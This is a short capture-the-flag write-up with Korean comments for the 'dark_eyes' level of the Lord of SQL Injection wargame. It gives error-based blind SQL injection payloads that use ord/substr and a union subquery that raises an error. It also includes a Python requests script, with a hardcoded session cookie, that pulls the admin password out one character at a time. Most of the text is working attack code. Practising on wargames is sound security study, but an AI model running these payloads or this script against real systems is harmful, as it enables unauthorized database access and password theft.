[load of sql injection] dark_eyes

Error based blind sql injection

[조건] or [에러]

' or 1=1 order by (select ord(substr(pw,1,1))>10) %23

* ?pw=' or id='admin' and (select 1 union select (ord(substr(pw,1,1))=53))%23 왜 반환 행이 2개면 오류가 나야되는가

import requests

url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"

cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID

list1 = []

for k in range( 1, 12 ):

    for j in range( 30, 300):

        text = "' or ord(substr(pw,"+str(k)+",1))>"+str(j)+" or (select 1 union select ord(substr(pw,1,1))) -- "

        params = { 'pw' : text }

        response = requests.get( url, params = params, cookies = cookies )

        print(text)

        print(response.text)

        if( not "ord" in response.text ):

            print( response.text )

            list1.append(chr(j+1))

            break

print(list1)

#' or 1=(select (ord(substr(pw,1,1))>10)) or (select 1 union select 2) --%20

#' or id='admin' and ord(substr(pw,1,1))=33 or (select 1 union select ord(substr(pw,1,1))) --%20